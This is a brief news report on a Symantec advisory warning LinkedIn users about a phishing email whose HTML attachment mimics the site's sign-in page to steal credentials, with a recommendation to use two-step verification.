BENGALURU: Internet security firm Symantec on Monday warned users of professional networking site LinkedIn to beware of emails which claim to be from the support team of the website.
In an advisory, Symantec said this is a phishing email, which would trap the user into sending his credentials to the hacker. The email claims that the user’s account has irregular activity, and recommends a ‘security update’ for the account. The user is then asked to download an attached form in HTML format and follow the instructions there.
“The attachment is a copy of the real LinkedIn.com website. However, the website’s source has been modified, so if the recipients use this web page to sign in to their LinkedIn account, their credentials will be sent directly to the attacker,” the advisory said.
In the email being sent out, the word LinkedIn is spelt with a lowercase ‘l’ instead of a capital ‘L’, which can fool some email filters into allowing the mail into the users’ inbox. “The most important technique here is the HTML attachment. This method bypasses browser blacklists that often flag suspicious websites to prevent users from being phished,” Symantec said.
A simple way to avoid falling prey to the scam is to use a two-step verification, which will help control access to accounts through passwords sent to mobile phones, the advisory said.